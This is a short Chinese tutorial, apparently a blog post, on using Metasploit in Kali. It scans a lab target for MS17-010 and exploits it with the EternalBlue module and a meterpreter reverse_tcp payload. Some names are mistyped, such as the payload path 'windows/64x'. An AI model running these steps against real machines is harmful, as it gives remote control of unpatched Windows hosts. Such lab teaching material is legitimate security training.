0
点赞
收藏
分享

微信扫一扫

Metasploit工具配置使用

香小蕉 2022-01-13 阅读 55
网络安全

1.在操作系统kali上打开终端,使用以下命令启动Metasploit终端:

msfconsole

2.检查靶机是否存在ms17-010漏洞

(1)搜索ms17-010相关模块:

search ms17-010

(2)分别输入以下命令,使用amb_ms17_010模块进行漏洞检测,确认其存在ms17-010漏洞:

use auxiliary/scanner/smb/smb_ms17_010  //使用模块

show options //查看模块需要设置哪些参数

set RHOSTS 靶机ip  //设置目标机的ip

run  //执行

 

3.关于缓冲区溢出攻击,exploit模块使用

(1)分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:

use exploit/windows/smb/ms17_010_eternalblue  //进入 ms17_010_eternalbluemok

set RHOST 靶机ip  // 设置远程主机ip地址

set LHOST 操作机ip  // 设置本地主机ip

set payload windows/64x/meterpreter/reverse_tcp  //使用payload:meterpreter/reverse_tcp

set RPORT 445  //设置目标端口

set target 0  //设置目标操作系统类型

run

 

举报

相关推荐

0 条评论